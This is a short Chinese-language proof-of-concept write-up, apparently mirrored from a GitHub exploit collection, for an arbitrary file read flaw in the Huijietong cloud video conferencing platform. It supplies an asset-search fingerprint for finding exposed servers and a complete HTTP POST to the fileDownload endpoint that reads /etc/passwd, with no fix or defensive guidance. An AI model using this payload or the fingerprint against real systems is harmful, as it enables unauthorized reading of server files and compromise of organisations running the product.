mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 03:17:07 +00:00
36 lines
1.6 KiB
Markdown
36 lines
1.6 KiB
Markdown
# 会捷通云视讯平台任意文件读取漏洞
|
||
|
||
# 一、漏洞复现
|
||
<font style="color:rgb(0,0,0);">会捷通云视讯平台是基于软视频会议在私有云或者公有云环境下提供的企业级视频通讯平台,可以为用户提供跨越企业内外,基于会议室、桌面和移动应用的视频通讯和会议解决方案,会捷通云视讯平台平台fileDownload处存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件。</font>
|
||
|
||
# <font style="color:rgb(0,0,0);">二、影响版本</font>
|
||
+ <font style="color:rgb(0,0,0);">会捷通云视讯平台</font>
|
||
|
||
# <font style="color:rgb(0,0,0);">三、资产测绘</font>
|
||
+ hunter`web.body="/him/api/rest/v1.0/node/role"`
|
||
+ 特征
|
||
|
||

|
||
|
||
# 四、漏洞复现
|
||
```plain
|
||
POST /fileDownload HTTP/1.1
|
||
Host: xx.xx.xx.xx
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept-Encoding: gzip, deflate
|
||
Connection: close
|
||
Upgrade-Insecure-Requests: 1
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 46
|
||
|
||
action=downloadBackupFile&fullPath=/etc/passwd
|
||
```
|
||
|
||

|
||
|
||
|
||
|
||
> 更新: 2024-02-29 23:55:45
|
||
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cbnq9fgdga6chkxw> |